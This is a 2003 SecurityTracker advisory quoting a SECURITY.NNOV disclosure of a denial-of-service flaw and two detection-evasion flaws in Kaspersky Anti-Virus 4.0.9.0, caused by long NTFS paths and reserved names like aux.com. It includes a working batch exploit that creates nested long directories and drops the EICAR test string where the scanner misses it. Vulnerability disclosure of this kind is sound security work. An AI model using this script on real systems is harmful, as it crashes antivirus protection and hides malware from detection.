Kaspersky Anti-Virus Can Be Crashed By Local Users
|
|
SecurityTracker Alert ID: 1006073 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Feb 11 2003
|
Impact: Denial of service via local system
|
Exploit Included: Yes
|
Advisory: SECURITY.NNOV
|
Version(s): 4.0.9.0
|
Description: A denial of service vulnerability was reported in Kaspersky Anti-Virus. A local user can cause the scanner to crash. A local user can also create malicious files that will not be detected by the scanner.
SECURITY.NNOV reported that a local user can create a file with an NTFS file path longer than 256 characters to cause the KAV monitor
service to crash or to consume 100% of available CPU resources. A demonstration exploit batch file is provided in the Source Message.
It
is also reported that malicious files with long NTFS file path names will not be detected by the scanner.
It is also reported
that malicious files with special NTFS file names (e.g., aux.vbs, aux.com) will not be detected by the scanner.
The vendor has
reportedly been notified.
|
Impact: A local user can cause the scanner to crash. A local user can create malicious files with certain file path name characteristics to avoid detection.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.kaspersky.com/ (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Windows (NT), Windows (2000)
|
Reported By: 3APA3A <3APA3A@SECURITY.NNOV.RU>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 11 Feb 2003 13:09:58 +0300
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Subject: SECURITY.NNOV: Kaspersky Antivirus DoS
|
Title: Kaspersky Antivirus DoS
Affected: Kaspersky Antivirus 4.0.9.0
(Server and Workstation version on
Windows NT 4.0 and Windows 2000).
Author: ZARAZA <3APA3A@SECURITY.NNOV.RU>
Vendor: Kaspersky Lab
Date: January, 30 2003
Risk: Average
Exploitable: Yes
Remote: Yes (for server versions)
Vendor Notified: January, 30 2003
I. Introduction:
Kaspersky Antivirus (KAV) is a family of antiviral products.
II. Vulnerability:
Few vulnerabilities were identified. Most serious allows user to crash
antiviral server remotely (write access to any directory on remote
server is required).
1. Long path crash
2. Long path prevents malware from detection
3. Special name prevents malware from detection
III. Details:
1. Long path crash
NTFS file system allows to create paths of almost unlimited length. But
Windows API does not allow path longer than 256 bytes. To prevent
Windows API from checking requested path \\?\ prefix may be used to
filename. This is documented feature of Windows API. Paths longer than
256 characters will cause KAV monitor service to crash or hang with 100%
CPU usage. Possibility of code execution is not researched.
2. Long path prevents malware from detection
Long path will also prevent malware from detection by antiviral scanner.
3. Special name prevents malware from detection
It's possible to create NTFS file with name like aux.vbs or aux.com.
Malware in this file will not be detected.
IV. Exploit:
This .bat file demonstrates vulnerability.
1,2 Long path crash & Long path prevents malware from detection
@echo off
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\%A%\%A%\%A%\%A
%\%A%\%A%\%A%.com
3. Special name prevents malware from detection
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\aux.com
V. Vendor
No response from vendor.
--
http://www.security.nnov.ru
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A }
+-------------o66o--+ /
|/
You know my name - look up my number (The Beatles)
|
|
